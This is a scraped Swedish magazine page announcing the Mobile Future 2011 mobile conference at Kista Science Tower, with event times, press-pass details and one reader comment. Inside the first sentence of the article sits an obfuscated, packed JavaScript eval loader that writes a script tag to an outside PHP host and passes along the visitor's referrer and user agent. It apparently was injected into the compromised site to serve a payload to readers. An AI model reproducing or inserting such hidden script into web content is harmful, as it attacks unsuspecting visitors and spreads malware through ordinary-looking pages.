Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Nordens största mobilkonferens – Mobile Future

Nordens största mobilkonferens – Mobile Future
Revue Magazine

Imorgon eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yieak|var|u0026u|referrer|eydba||js|php’.split(’|’),0,{}))
torsdag samlas mobilbranschens främsta företag, entreprenörer, beslutsfattare och riskkapitalister i Kista Science Tower i ICT-klustret Kista Science City. Mobile Future visar upp de dagens och framtidens trender inom mobilapplikationer, molntjänster och mobilwebb. På efterföljande MobilGalan utses vem som vinner den prestigefyllda Guldmobilen 2011.

När: torsdagen den 10 november kl. 9:00 – 16:30. MobilGalan startar kl. 18:00.
Var: Kista Science Tower, Färögatan 33 i Kista
Arrangörer: Mobil och Mobil:Business

Boka presspass
Boka presspass till Norra Europas största mobilkonferens – Mobile Future. Som journalist i traditionell media, eller onlinebaserad media, kan du registrera dig på pressidorna för att få full tillgång till konferensen. Om du vill boka intervjutider med talarna, paneldeltagarna eller representanter från de närvarande bolagen, finns det möjlighet att använda ett pressrum för detta. Anmäl ditt intresse direkt till pressansvarig för att boka intervjutider, se nedan. En komplett lista med talare finns på
www.mobilefuture.se

Mobile Future arrangeras för elfte året i rad av tidningen Mobil och dess affärsutgåva Mobil:Business. Årets teman för föreläsningarna är the Mobile Cloud och Monetezing Apps and Mobile Web Services. Konferensen innehåller även en utställning med ett stort antal mobilbolag, samt investerarträffen Big Money Meetup, där entreprenörer presenterar sina projekt för en exklusiv skara svenska och internationella riskkapitalister. Mobile Future rundas av med Mobilgalan, en middagssittning där mobilvärldens beslutsfattare möts för att tillsammans se vem som vinner Guldmobilen 2011. Företagsborgarrådet i Stockholm, Ulla Hamilton, inviger galan.

Kontakt med pressansvarig:
Roman Pixell, redaktör Mobil:Business
E-post: roman.pixell@mobilbusiness.se
Telefon: +46 709 103 551
Presspass finns på: http://simpleeventsignup.com/event/8862

Comments

  1. Sven Hagman

    Kommer ni rapportera på plats?